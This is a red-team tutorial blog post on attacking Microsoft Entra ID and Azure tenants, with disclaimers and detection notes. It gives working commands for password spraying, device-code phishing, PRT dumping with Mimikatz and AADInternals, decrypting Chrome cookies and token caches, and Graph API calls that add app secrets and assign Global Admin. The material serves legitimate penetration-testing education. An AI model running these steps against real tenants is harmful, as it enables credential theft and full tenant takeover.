Red Team Basics: Entra & Azure Pentesting
Standard disclaimer, same as Part 1: Everything in this post requires authorization. If you're testing against infrastructure you don't own or don't have written permission to test, that's a crime. Don't be stupid. I test against my own Azure tenant under Microsoft's Safe Harbor guidelines as an MSRC researcher. You need equivalent authorization before you touch any of this.
Part 1 covered on-prem AD: NTLM hashes, Kerberos tickets, delegation abuse, all the classics. This is Part 2, and it's a different world. Cloud pentesting doesn't work the same way. There's no LSASS to dump, no NTLM relay, no unconstrained delegation on a file server somebody forgot about. But the attack surface is just as wide. It's just shifted.
Cached credentials on workstations become OAuth tokens and refresh tokens. Group Policy abuse gives way to Conditional Access gaps and overprivileged app registrations. Where you'd have run BloodHound to map AD paths, now it's AzureHound mapping Entra roles and Graph API permissions. The thinking is the same, the tools are different.
Microsoft deprecates endpoints, rotates default behaviors, and patches token flows without changelog entries. Some of what I write here might already be partially mitigated by the time you read it. I'll note where that's the case, but check current docs before you assume something still works exactly as described.
This post references about 15 tools across the kill chain. Rather than front-loading a wall of links, each tool is introduced where it's actually used. There's a full reference table with GitHub links in the appendix.
Initial access: getting into the tenant
Everything starts with a token. You can't query Graph, you can't enumerate the directory, you can't do anything useful until you have an authenticated session in the tenant. That's the first problem to solve. In on-prem AD, initial access usually means compromising a workstation or getting credentials through phishing. In Entra, the paths are different but the goal's the same: get a valid token.
Password spraying
Requires: target domain name. No credentials needed.
Same concept as on-prem, different execution. You're hitting Entra's authentication endpoints with common passwords across many accounts. The tools have gotten pretty specific to Entra's behavior.
MSOLSpray is the classic. It sprays against the Microsoft Online login endpoint and can tell you which accounts exist, which have MFA, and which ones actually authenticate with the password you tried. Worth noting: MSOLSpray is essentially unmaintained at this point (a handful of commits in 2020, nothing since). It still works, but if you want something actively maintained, check out EntraSpray instead.
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -Verbose
o365spray does the same thing in Python and adds user enumeration as a separate step:
python3 o365spray.py --enum -U users.txt -d contoso.com
python3 o365spray.py --spray -U valid_users.txt -P passwords.txt -d contoso.com --rate 1
Smart lockout defaults to 10 failed attempts with escalating lockout duration. One password per account per hour keeps you under threshold. Lockout responses are your signal to back off.
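The pacing math is easy to get wrong mid-engagement, so it's worth keeping in code. A minimal Python sketch, using the smart-lockout defaults from above (the class and method names are mine, not from any spray tool):

```python
import time
from collections import defaultdict

LOCKOUT_THRESHOLD = 10   # Entra smart lockout default (failed attempts)
MIN_INTERVAL = 3600      # one attempt per account per hour, in seconds

class SprayScheduler:
    """Tracks per-account attempts so a spray stays under smart lockout."""

    def __init__(self):
        self.last_attempt = defaultdict(lambda: float("-inf"))
        self.failures = defaultdict(int)

    def can_try(self, account, now=None):
        now = time.time() if now is None else now
        if self.failures[account] >= LOCKOUT_THRESHOLD - 1:
            return False  # back off well before the lockout threshold
        return now - self.last_attempt[account] >= MIN_INTERVAL

    def record(self, account, success, now=None):
        now = time.time() if now is None else now
        self.last_attempt[account] = now
        if not success:
            self.failures[account] += 1
```

Wire this in front of whatever actually sends the auth requests and you get throttling that survives a restart of your attention, if not of your process.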
Here's what o365spray actually looks like against a real tenant. Five candidate usernames in, two confirmed valid in under a second:
python3 o365spray.py --enum -U users.txt -d contoso.onmicrosoft.com
# Output:
[info] Validating: contoso.onmicrosoft.com
[VALID] The following domain appears to be using O365: contoso.onmicrosoft.com
[info] Running user enumeration against 5 potential users
[VALID] admin@contoso.onmicrosoft.com
[VALID] j.smith@contoso.onmicrosoft.com
[INVALID] fake.user@contoso.onmicrosoft.com
[INVALID] helpdesk@contoso.onmicrosoft.com
[INVALID] test.user@contoso.onmicrosoft.com
[info] Valid Accounts: 2
EntraSpray takes it further. Instead of just confirming whether accounts exist, it sprays a password and differentiates the responses through ROPC error codes:
python3 entraspray.py -u valid_users.txt -p "Password123" -d contoso.onmicrosoft.com
# Output:
[*] There are 3 total users to spray.
[*] Now spraying Microsoft Online.
[*] Valid user, but invalid password admin@contoso.onmicrosoft.com
[-] The user fake.user@contoso.onmicrosoft.com doesn't exist.
[-] The user helpdesk@contoso.onmicrosoft.com doesn't exist.
[*] No users compromised.
"Valid user, but invalid password" is AADSTS50126. "Doesn't exist" is AADSTS50034. Two different error codes for two different situations, and Entra hands you that distinction for free. You learn a lot from a spray even when you don't crack anything. Microsoft has been gradually normalizing these error responses in some tenants, returning the same error regardless of whether the user exists. This still works on many tenants as of early 2026, but don't count on it everywhere.
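Those AADSTS codes are worth automating. A small Python helper that pulls the code out of a token-endpoint error_description and interprets it -- the 50126/50034 mappings come from above; the extra codes are other commonly observed responses, and the function name is mine:

```python
import re

AADSTS_MEANINGS = {
    "AADSTS50126": "valid user, wrong password",
    "AADSTS50034": "user does not exist",
    "AADSTS50053": "account locked (smart lockout) - back off",
    "AADSTS50076": "valid credentials, MFA required",
    "AADSTS50057": "valid user, account disabled",
}

def classify_spray_response(error_description: str) -> str:
    """Extract the AADSTS code from a token-endpoint error and interpret it."""
    m = re.search(r"AADSTS\d+", error_description or "")
    if not m:
        return "unknown"
    return AADSTS_MEANINGS.get(m.group(0), f"unmapped code {m.group(0)}")
```

Feed it the error_description field from the token endpoint's JSON error body and log the result per account.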
OPSEC: Loud. Every attempt generates a sign-in event in Entra audit logs. Smart lockout tracks failed attempts per-user, and Entra ID Protection flags spray patterns automatically.
Device code phishing
Requires: ability to message the target (email, Teams, etc). No credentials needed.
You start a device code flow, get a code and URL (microsoft.com/devicelogin), and send both to the target. They authenticate normally including MFA. You get their tokens. MFA-satisfied, no technical exploit required.
TokenTactics automates this:
Import-Module .\TokenTactics.psd1
# Get-AzureToken starts the device code flow and polls until the target signs in.
# It defaults to first-party Microsoft client IDs
# (d3590ed6-52b3-4102-aeff-aad2292ab01c is Microsoft Office).
Get-AzureToken -Client MSGraph
# The user code and verification URL are printed - send those to the target.
# Once they authenticate, tokens land in the $response variable.
When the device code flow starts, you get something like this:
user_code : CXBMR7GML
device_code: DAQABAAEAAAD--DLA3VO7QrddgJg7WevrQvnF...
message : To sign in, use a web browser to open the page https://microsoft.com/devicelogin
and enter the code CXBMR7GML to authenticate.
The ClientId matters. Use a first-party Microsoft app ID. The consent screen looks normal, no third-party warning.
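Under the hood this is just two plain OAuth requests against the v2.0 endpoints: one to start the flow, one to poll for tokens. A Python sketch that builds both requests without sending them (the helper names are mine; the client ID is the Microsoft Office one from above):

```python
import urllib.parse

TENANT = "organizations"
CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"  # Microsoft Office, first-party

def device_code_request():
    """Endpoint and POST body that start the device code flow."""
    url = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/devicecode"
    body = urllib.parse.urlencode({
        "client_id": CLIENT_ID,
        "scope": "https://graph.microsoft.com/.default offline_access",
    })
    return url, body

def token_poll_request(device_code):
    """Endpoint and POST body to poll for tokens.

    The token endpoint returns 'authorization_pending' until the target
    completes sign-in, then hands back access and refresh tokens.
    """
    url = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token"
    body = urllib.parse.urlencode({
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": CLIENT_ID,
        "device_code": device_code,
    })
    return url, body
```

The first response contains the user_code and verification URL you send to the target; you then POST the second request on the interval the response specifies.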
Microsoft has been adding mitigations. You can block device code flow in Conditional Access now (under "Authentication flows"). If you're on the defensive side and you're not using device code flow legitimately, block it. Many orgs don't need it.
OPSEC: Quiet. Looks like a normal device code login flow. The only tell is the client ID used, and most orgs don't inspect that in their sign-in logs.
Detection: Sign-in logs show "Device code" as the authentication protocol. Filter for authenticationProtocol "deviceCode" and alert on any usage outside expected service accounts or kiosk devices.
Token theft
Requires: local admin on an Entra-joined or hybrid-joined device, OR access to a machine where the target has authenticated.
If you've already got access to a user's machine, you don't need their password. You need their tokens.
Primary Refresh Tokens (PRTs) are the big one on Azure AD-joined or Hybrid-joined devices. A PRT is a long-lived token that SSOs the user into everything. It carries the user's authentication state, including whether they passed MFA, so anything you do with a stolen PRT satisfies those Conditional Access checks without you ever touching an authenticator app. The PRT refreshes itself silently in the background, which means access persists until someone explicitly revokes it or the device falls out of compliance.
Quick sidebar on what you're actually looking at when you grab one: a PRT is a JWT (JSON Web Token). Three Base64-encoded sections separated by dots. The header says which signing algorithm was used (usually RS256). The payload has the claims that matter: sub (user ID), tid (tenant ID), deviceId, amr (authentication methods, so you can see if MFA was in the session), and exp (expiration). The third section is the cryptographic signature. Paste one into jwt.ms and you can read all of this. Knowing the structure helps you verify you actually grabbed a PRT and not some other token, and the claims tell you what access you're working with.
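Checking those claims is a ten-line exercise if you'd rather not paste tokens into a website. A Python helper that splits and Base64url-decodes a JWT without verifying the signature (the function name is mine; don't use this anywhere signature validation matters):

```python
import base64
import json

def decode_jwt(token: str) -> dict:
    """Return a JWT's header and payload as dicts. No signature check."""
    def b64url_decode(segment):
        segment += "=" * (-len(segment) % 4)  # restore stripped padding
        return json.loads(base64.urlsafe_b64decode(segment))

    header_seg, payload_seg, _signature = token.split(".")
    return {
        "header": b64url_decode(header_seg),    # alg, typ
        "payload": b64url_decode(payload_seg),  # sub, tid, deviceId, amr, exp
    }
```

Check `payload["amr"]` for "mfa" to see whether the session you stole already satisfies MFA-requiring Conditional Access policies.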
Extraction with Mimikatz: The classic approach is sekurlsa::cloudap. Run Mimikatz as admin, enable debug privileges, and dump the PRT from memory:
mimikatz # sekurlsa::cloudap
# Output includes:
# * Primary Refresh Token *
# base64(PRT): eyJhbGciOiJSUzI1NiIs...
# Authority: https://login.microsoftonline.com/<tenant_id>
# UserPrincipalName: user@contoso.com
# DeviceId: abcdef12-3456-789a-bcde-f1234567890a
# SessionKey: x12345sessionkey==
2026 caveat: Windows 11 23H2+ enables RunAsPPL by default (on fresh enterprise installs; upgrades may not have it enabled), which blocks Mimikatz from touching LSASS. You'll see an "access denied" on the cloudap dump. On older builds or machines where an admin disabled it, still works fine. But on a modern hardened workstation, this path is dead.
AADInternals as an alternative: Less noisy than Mimikatz. It's a PowerShell module built specifically for Entra, and most AV doesn't flag it the way it flags Mimikatz (which gets caught on signature alone these days). To be clear, the AV concern is about running tools on the target machine post-compromise -- you're dumping credentials from LSASS on the compromised endpoint, not your own box.
Import-Module AADInternals
# Grab a PRT token from the current session, then trade it for an access token
$prtToken = Get-AADIntUserPRTToken
Get-AADIntAccessTokenForMSGraph -PRTToken $prtToken
Same result, different detection profile. You still need admin on the box, but you're not dropping a binary that every EDR on the planet has a signature for.
roadtx (the token tool in Dirk-jan Mollema's ROADtools suite) is another option for requesting and using PRTs:
# Request a PRT with user credentials plus a device certificate and key
# (registered earlier with roadtx device)
roadtx prt -u user@contoso.com -p 'Password123' -c device.pem -k device.key
# Use the stored PRT to get access tokens for Graph, etc.
roadtx prtauth
Manual token exchange: Once you have the PRT, you don't need any special tooling to use it. It's just an OAuth refresh token exchange against the v2.0 endpoint. Here's the raw request:
$body = @{
grant_type = "refresh_token"
client_id = "1b730954-1685-4b74-9bfd-dac224a7b894" # Azure AD PowerShell client ID
refresh_token = "<stolen_PRT>"
}
$response = Invoke-RestMethod -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" -Method Post -Body $body
$response.access_token
Note: This is simplified. In practice, the PRT exchange requires a signed JWT request using the device's session key (nonce-based). Tools like ROADtools and AADInternals handle this automatically. A raw PRT pasted into a standard refresh_token grant will fail.
That gives you a fresh access token. From there it's just Graph API calls, az CLI, whatever you want. The PRT itself can keep generating new access tokens until it's revoked, so one successful extraction gives you persistent access.
With an access token in hand, you're calling Graph directly. Read the mailbox, enumerate the directory, check what permissions the token carries. If you grabbed a refresh token, exchange it for access tokens to different resources: Graph, Azure Management, Outlook, Teams. A refresh token is a master key; one token gives you multiple surfaces to attack.
Device binding and replay: The PRT is tied to the device it was issued on. Entra ID checks the device identity, which is a certificate and transport key pair stored under HKLM\SYSTEM\CurrentControlSet\Control\CloudDomainJoin\JoinInfo\<thumbprint>. On devices without TPM (or with TPM disabled), the transport key is software-protected and encrypted with DPAPI, so an attacker with local admin can export both the device certificate and transport key (e.g., via AADInternals) and replay the PRT from another machine. On devices with TPM 2.0, the transport key is hardware-bound and never leaves the chip, so PRT replay from a different machine is not possible. VMs without vTPM, older Windows 10 builds, and devices where TPM attestation was disabled remain vulnerable. Check TransportKeyStatus in the JoinInfo registry key: a value of 3 means TPM-protected, 0 means software-only. Know your target before you spend time on extraction.
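If you script the triage, the decision above reduces to a lookup. A sketch based on the TransportKeyStatus values described in this section -- treat the 0/3 mapping as field-observed rather than formally documented:

```python
# TransportKeyStatus values as described above (observed, not documented)
TRANSPORT_KEY_STATUS = {
    0: "software-only (DPAPI) - cert and transport key are exportable",
    3: "TPM-protected - transport key never leaves the chip",
}

def prt_replay_feasible(status: int) -> bool:
    """Only software-protected transport keys can be exported with local admin."""
    return status == 0
```

Run the registry read on the target, feed the value through this, and you know whether PRT extraction is worth the time before you start.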
Browser cookies: the other token cache
If you have access to a user's machine, browser cookies are one of the easiest token sources.
- Safari (macOS): cookies stored unencrypted at ~/Library/Cookies/Cookies.binarycookies (parse with Python's binarycookies library).
- Chrome (macOS): SQLite database at ~/Library/Application Support/Google/Chrome/Default/Cookies, encrypted with AES-128-CBC using a key from the macOS Keychain ("Chrome Safe Storage", derived via PBKDF2 with salt "saltysalt" and 1003 iterations).
- Edge (macOS): same Chromium encryption scheme.
- Chrome/Edge (Windows): cookies protected with DPAPI, which ties decryption to the logged-in user's session, so you need to run as that user or have their credential material.
The cookies you're looking for: ESTSAUTH (session cookie, current session only), ESTSAUTHPERSISTENT (persistent SSO, survives browser close, this is the dangerous one), and x-ms-RefreshTokenCredential (PRT cookie). If you get ESTSAUTHPERSISTENT, you can replay it from a different machine and authenticate as that user without MFA. The cookie already satisfied MFA when the legitimate user logged in.
security find-generic-password -w -a "Chrome" -s "Chrome Safe Storage"
# Key derivation: PBKDF2(keychain_key, salt="saltysalt", iterations=1003)
# Decrypt v10-prefixed values with AES-128-CBC, IV = 16 spaces
# Filter for login.microsoftonline.com domain
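The key derivation step above is pure stdlib. A Python sketch of it (the final AES-CBC decrypt of v10-prefixed values needs a third-party crypto library, so it's left as a comment):

```python
import hashlib

def chrome_macos_cookie_key(safe_storage_password: str) -> bytes:
    """Derive Chrome's macOS cookie key: PBKDF2-SHA1, salt 'saltysalt',
    1003 iterations, 16-byte AES key."""
    return hashlib.pbkdf2_hmac(
        "sha1",
        safe_storage_password.encode(),
        b"saltysalt",
        1003,
        dklen=16,
    )

# To decrypt a cookie value: strip the 'v10' prefix, then AES-128-CBC
# with this key and an IV of 16 spaces (b" " * 16), e.g. via pycryptodome.
```

The input is the "Chrome Safe Storage" password pulled from the Keychain with the `security` command above.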
Detection: Anomalous token replay from a new device ID that doesn't match the original authentication device triggers Entra ID Protection alerts. Monitor sign-in logs for token replay risk events. Token Protection and CAE, covered in detail below, are the primary defenses.
Token Protection (Proof-of-Possession): This is the real counter to token theft. Token Protection is a Conditional Access session control that binds tokens to the device that originally requested them using a cryptographic proof-of-possession mechanism. If it's enforced, replaying a stolen token from a different machine just fails. The token includes a device-bound claim that the relying party validates, and you can't forge it without the device's keys. As an enumeration step, check whether the target tenant actually has it turned on: pull the CA policies and look for the token protection session control (Graph exposes it as sessionControls.secureSignInSession). If you don't see it, stolen tokens replay just fine from any machine. If you do see it, you're stuck working from the original device or finding a way to proxy through it. As of early 2026, Token Protection is still in limited rollout and only covers specific workloads (Exchange Online and SharePoint Online were the first). Most orgs either haven't enabled it or don't know it exists. But it's worth checking before you burn time extracting cookies that won't work.
$policies = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
$policies.value | Where-Object {
    # Token Protection surfaces as the secureSignInSession session control
    $_.sessionControls.secureSignInSession.isEnabled -eq $true
} | Select-Object displayName, state
Access tokens from memory: any process that's authenticated to Entra has access tokens in memory. If you can dump the process memory (az CLI, PowerShell with the Az module, Teams), you'll find tokens in there. They're short-lived (usually 60-90 minutes) but that's plenty of time if you know what you're looking for.
# Windows path:
type %USERPROFILE%\.azure\msal_token_cache.json
# Or in PowerShell:
Get-Content "$env:USERPROFILE\.azure\msal_token_cache.json" | ConvertFrom-Json
The az CLI token cache is one of the first things I check on a compromised machine. Historically it was plaintext JSON, no encryption, with the refresh tokens of anyone logged into az CLI sitting right there. Newer versions of az CLI encrypt the token cache using the OS keychain (macOS Keychain, Windows DPAPI), but older installations and some CI/CD environments still store it as plaintext JSON. Check the file - if it's readable, you're in luck.
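Triage of a readable cache file scripts easily. A Python sketch that lists cached refresh-token entries, assuming the standard MSAL cache layout with a top-level "RefreshToken" section -- verify against the file you actually find, and the function name is mine:

```python
import json

def list_refresh_tokens(cache_json: str):
    """Return (home_account_id, client_id) pairs for cached refresh tokens.

    Assumes the MSAL file-cache schema: top-level sections such as
    "RefreshToken", "AccessToken", and "Account", each keyed by a
    composite cache key.
    """
    cache = json.loads(cache_json)
    entries = []
    for entry in cache.get("RefreshToken", {}).values():
        entries.append((entry.get("home_account_id"), entry.get("client_id")))
    return entries
```

Point it at msal_token_cache.json; each pair tells you which account and which client app the refresh token belongs to, which determines what you can exchange it for.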
OPSEC: Quiet locally. Extraction happens on-disk or in-memory with no cloud-side logging. But using stolen tokens from a new IP or device may trigger impossible travel alerts or anomalous token activity in Entra ID Protection.
Detection: Sign-in from a new device or location without MFA re-prompt. Entra ID Protection flags impossible travel and anomalous token activity. Watch for refresh token redemptions from IPs that don't match the original sign-in.
Illicit consent grants
Requires: ability to register an application, or social engineer an admin into granting consent to a malicious app.
This is the OAuth version of "can I borrow your keys?" You create a malicious application registration and trick a user (or admin) into granting it permissions. Once consented, the app has its own credentials and can access data independently of the user's session.
The dangerous permissions to request:
- Mail.Read or Mail.ReadWrite - read their email, set up forwarding rules
- Files.ReadWrite.All - access OneDrive and SharePoint
- User.ReadWrite.All - modify user properties
- Directory.ReadWrite.All - modify directory objects
Most tenants restrict which users can consent to apps (this is configurable under Enterprise Applications > User settings). But I still find tenants where any user can consent to any delegated permission. That's a problem.
Check what your tenant allows:
$authzPolicy = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/policies/authorizationPolicy"
# Invoke-MgGraphRequest returns a hashtable, so index into it directly
$authzPolicy.defaultUserRolePermissions.permissionGrantPoliciesAssigned
If that returns "ManagePermissionGrantsForSelf.microsoft-user-default-legacy," users can consent to almost anything. You want it set to "ManagePermissionGrantsForSelf.microsoft-user-default-recommended" at minimum, which restricts consent to verified publishers and low-risk permissions.
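A tiny helper makes that interpretation explicit when you're checking multiple tenants. It just encodes the guidance above (the function name is mine):

```python
def user_consent_risk(policies):
    """Classify a tenant's user-consent posture from
    authorizationPolicy.defaultUserRolePermissions.permissionGrantPoliciesAssigned."""
    if any("microsoft-user-default-legacy" in p for p in policies):
        return "high: users can consent to almost any delegated permission"
    if any("microsoft-user-default-recommended" in p for p in policies):
        return "moderate: consent limited to verified publishers and low-risk scopes"
    if not policies:
        return "low: user consent appears disabled"
    return "custom: review the assigned grant policies manually"
```

Feed it the permissionGrantPoliciesAssigned array from the Graph call above.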
Detection: "Consent to application" in the Entra audit log. Look for consent events where the initiator is a non-admin user and the permissions include Mail, Files, or Directory scopes.
At this point you have an authenticated session in the tenant. Maybe it's a sprayed credential, maybe it's a phished token, maybe you pulled it off a compromised machine. Either way, you're in. Now you need to figure out what you're working with.
Enumeration: what a regular user can see
You've got a valid token. That's your foothold. But a token for a standard user doesn't get you much on its own. You need to figure out what's in this tenant and where the interesting attack paths are: who has admin roles, which apps are overprivileged, where the Conditional Access gaps are. The good news is that Entra gives away a lot of this information to any authenticated user by default.
Default user permissions
Requires: any valid user credentials.
Out of the box, a standard Entra user can:
- Read all user profiles (names, email addresses, phone numbers, job titles, managers)
- Read all group memberships
- Read all application registrations
- Read the tenant's organization info
- Read their own authentication methods
- Read all devices registered in the tenant
That's a lot. You can restrict some of this (under Entra > User settings > "Restrict access to Microsoft Entra admin center" and "Users can register applications"), but many tenants leave the defaults.
# All users in the tenant
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users?`$select=displayName,mail,jobTitle,department"
# All groups
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/groups?`$select=displayName,description,groupTypes"
# All app registrations
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications?`$select=displayName,appId,requiredResourceAccess"
# All service principals
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$top=999"
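One gotcha with those calls: Graph pages its results, and $top=999 only gets you the first page. Large tenants need the @odata.nextLink loop. A Python sketch with the HTTP call stubbed out so the pattern is clear (the function names are mine):

```python
def collect_all(fetch_page, first_url):
    """Follow @odata.nextLink until the server stops returning one.

    fetch_page is whatever does your authenticated GET and returns the
    parsed JSON body; Graph puts results in "value" and the next page's
    URL, if any, in "@odata.nextLink".
    """
    results = []
    url = first_url
    while url:
        page = fetch_page(url)
        results.extend(page.get("value", []))
        url = page.get("@odata.nextLink")  # absent on the last page
    return results
```

Same loop works for users, groups, applications, and service principals; only the first URL changes.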
Once you've got that data, it goes to your tooling. User list feeds into a spray tool for targeted password attacks on high-value accounts. Application list gets fed into your permission checker to find which ones have risky OAuth scopes. All of it stacks into AzureHound so you can query BloodHound for shortest path to Global Admin. The enumeration isn't the attack itself; it's the reconnaissance that tells you which attacks are actually exploitable in this specific tenant.
OPSEC: Quiet. These are standard read operations any authenticated user can make. No alerts fire unless the org has UEBA tuned to flag bulk directory reads.
AzureHound
AzureHound is BloodHound's cloud counterpart. It ingests Entra data and maps out attack paths the same way SharpHound does for on-prem AD. Role assignments, app permissions, group memberships, everything gets turned into a graph you can query for paths to Global Admin.
# You need a valid access token - get one via az login first
az login
$token = (az account get-access-token --resource https://graph.microsoft.com | ConvertFrom-Json).accessToken
# Run AzureHound with the token
./azurehound -j $token list --tenant contoso.onmicrosoft.com -o output.json
The collection output looks like this:
finished listing all users (999 found)
finished listing all groups (469 found)
finished listing all applications (320 found)
finished listing all service principals (847 found)
finished listing all role assignments (214 found)
finished listing all devices (156 found)
collection completed: output.json (7.4 MB)
Once you've ingested the data into BloodHound, the queries are where it gets useful. "Find shortest path to Global Admin" will show you every privilege escalation chain. In the tenants I've tested, there's almost always at least one path, and it's usually through an overprivileged app registration or a service principal with forgotten admin roles. In my test tenant, BloodHound showed 8 Global Admins (including 2 groups), 8 Privileged Role Admins, and multiple service principals with admin roles. The attack paths were immediate.
BloodHound CE: multiple users and groups with paths to Global Administrator. Each line is an exploitable relationship.
Pathfinding view: shortest path from a user to Global Administrator.
OPSEC: Moderate. AzureHound makes a large number of Graph API read calls in a short burst. Each call is a normal read, but the volume and speed can trip UEBA anomaly detection.
ROADtools / ROADrecon
ROADtools is Dirk-jan Mollema's toolkit for Entra enumeration. ROADrecon does the data collection, dumps everything into a local SQLite database, and gives you a web interface to browse through it offline.
roadrecon auth -u user@contoso.com -p 'Password123'
roadrecon gather
# Start the web UI to browse the data
roadrecon gui
2026 caveat: ROADrecon's gather command depends on Azure AD Graph (graph.windows.net), which is fully dead. You'll see this:
Error: 403 Forbidden - graph.windows.net is no longer available
Request ID: a1b2c3d4-5e6f-7890-abcd-ef1234567890
Use roadtx from the same toolkit instead. It uses Microsoft Graph and still works.
I like ROADrecon for offline analysis. You can dump the data once and then spend hours poking through app registrations, service principals, and role assignments without generating any more traffic against the tenant.
What to look for in the data:
- App registrations with Application.ReadWrite.All or RoleManagement.ReadWrite.Directory permissions
- Service principals with admin role assignments that nobody's using interactively
- Stale app registrations with active credentials (client secrets that haven't been rotated)
- Groups used in Conditional Access policies (compromising a member of an excluded group = bypassing CA)
- Users with the "Authentication Administrator" or "Privileged Authentication Administrator" roles (they can reset passwords and MFA for other users)
After enumeration, you have a map of the tenant: who's admin, which apps have dangerous permissions, where the gaps in CA policies are. You know the attack surface. Now you need to use it.
Detection: Large volume of Graph API read calls from a single user or service principal in a short window. Microsoft Graph activity logs (if enabled) show the specific endpoints queried. AzureHound collection is especially noisy with hundreds of sequential API calls.
Conditional Access gaps
Requires: valid credentials. Tests which endpoints enforce MFA.
With a foothold established, probe the tenant's Conditional Access configuration. CA policies are what stand between your token and the resources you want to reach, so understanding the gaps now informs your next moves. Conditional Access is Entra's policy engine: it decides who can access what, from where, on which devices, with what auth strength. It's powerful when configured right. It's usually not configured right.
MFASweep tests which protocols and endpoints enforce MFA and which don't:
Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username "user@contoso.com" -Password "Password123"
MFASweep confirmed the gap on my test tenant. Here's what it found:
| Endpoint | Password-Only Auth? | Protocol |
|---|---|---|
| Microsoft Graph API | YES - no MFA via ROPC | ROPC grant |
| Azure Service Management API | YES - no MFA via ROPC | ROPC grant |
| M365 Web Portal (all user agents) | NO - MFA enforced | Browser |
| Exchange Web Services (Basic Auth) | NO - blocked | Legacy auth |
| ActiveSync (Basic Auth) | NO - blocked | Legacy auth |
Note: ROPC was explicitly enabled on this test tenant. As of late 2025, Microsoft requires explicit enablement of ROPC against first-party apps in many tenant configurations. Production tenants increasingly block ROPC by default - check your tenant's authentication methods policy before assuming these results apply to your target.
The web portal blocks every user agent correctly, legacy auth (EWS, ActiveSync) is blocked, but the API endpoints are wide open via ROPC.
Common gaps I find:
- Legacy authentication not blocked. IMAP, POP3, SMTP AUTH, ActiveSync with basic auth. None of these support MFA. If they're not explicitly blocked in CA, they're a backdoor. Note that Microsoft has been phasing out SMTP AUTH basic auth (the original March-April 2026 enforcement timeline slipped; it's now set for default disable by December 2026). It's dying but not dead yet, and plenty of tenants still have it enabled.
- Platform-specific holes. CA policy says "require MFA on Windows and macOS" but doesn't mention Linux, iOS, or Android. An attacker just changes their user agent or uses a mobile device. I've walked through the front door on more than one engagement just by curling from a Linux box.
- Break-glass accounts excluded from all CA policies but with no sign-in monitoring. That's the design working as intended, right up until someone sprays the break-glass and nobody notices for three weeks.
- Service principal exclusions. Compromise one of the app IDs excluded from CA and you bypass the whole policy stack.
Privilege escalation: user to Global Admin
So you've got your recon dump and a low-priv token. Cool, but you can't actually do anything with that yet. You need to get from "standard user" to Global Admin or equivalent, and the paths usually run through overprivileged apps and forgotten service principals rather than through user accounts directly.
Dangerous Graph API permissions
Requires: compromise of a service principal or app with one of these permissions.
Not all API permissions are created equal. Some of them are effectively Global Admin with extra steps. GraphRunner's OAuth2 grant enumeration found a delegated permission grant with Application.ReadWrite.All and RoleManagement.ReadWrite.Directory on the test tenant. That's a full tenant compromise path just sitting in the grants table, and nobody had noticed.
The next step depends on what permissions are in the grant. If you found Application.ReadWrite.All or RoleManagement.ReadWrite.Directory, authenticate as the service principal using the delegated permissions, then call Graph API to assign yourself Global Admin via RoleManagement.ReadWrite.Directory. One API call from compromised user to full tenant admin. The grant IS the permission; the only question is whether you know how to use it.
Application.ReadWrite.All is the most dangerous permission in Graph. An app with this permission can modify any application registration in the tenant, including adding new credentials to them. If there's an app that already has high privileges, you just add your own client secret to it and authenticate as that app. Instant privilege escalation.
$body = @{
passwordCredential = @{
displayName = "Added by attacker"
endDateTime = "2026-12-31T00:00:00Z"
}
} | ConvertTo-Json -Depth 3
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/{target-app-id}/addPassword" -Body $body
RoleManagement.ReadWrite.Directory lets you assign Entra directory roles. Including Global Admin. To any account. That's it. Game over if an app has this as an application permission.
$body = @{
"@odata.type" = "#microsoft.graph.unifiedRoleAssignment"
principalId = "<target-user-object-id>"
roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10" # Global Admin role ID
directoryScopeId = "/"
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Body $body
Other permissions that are worse than they sound:
- AppRoleAssignment.ReadWrite.All lets you grant an app whatever API permissions you want. Pair it with a low-privilege app and you can bootstrap your way up.
- GroupMember.ReadWrite.All - add users to any group, including role-assignable groups tied to admin roles. This one flies under the radar because "managing group members" sounds harmless.
- ServicePrincipalEndpoint.ReadWrite.All - manage SAML and WS-Fed endpoint URLs on service principals, redirecting federated authentication flows to attacker-controlled endpoints.
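When you're triaging a grants dump, a set intersection against the scopes called out in this section is all you need. A Python sketch -- the permission list mirrors this section, it's not an exhaustive catalog:

```python
# Permissions flagged in this section as effective tenant-takeover paths
DANGEROUS_GRAPH_PERMISSIONS = {
    "Application.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "AppRoleAssignment.ReadWrite.All",
    "GroupMember.ReadWrite.All",
    "ServicePrincipalEndpoint.ReadWrite.All",
    "Directory.ReadWrite.All",
}

def escalation_candidates(granted):
    """Return which of an app's granted permission names warrant a closer look."""
    return sorted(set(granted) & DANGEROUS_GRAPH_PERMISSIONS)
```

Run it over each app's resolved permission names from your enumeration output and you get a short list of escalation targets instead of a 300-app haystack.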
Detection: "Add member to role" in the directory audit log. "Update application - Certificates and secrets management" when credentials are added to apps. PIM alerts fire if PIM is configured for directory roles.
App registration abuse
Requires: Application Administrator role, or ownership of the target app.
App registrations are the most commonly overlooked escalation path in Entra. Here's the pattern I see over and over:
- Someone creates an app registration for an automation script three years ago
- They give it high permissions because they need it to work
- They create a client secret with a two-year expiry
- They leave the company
- The app still works, nobody's monitoring it, the secret's still valid
If you compromise an account that owns an app registration (the "owner" property in Entra), you can add new credentials to it without needing any special admin role. The owner has full control over the app.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/ownedObjects/microsoft.graph.application"
# Find all app registrations and their owners
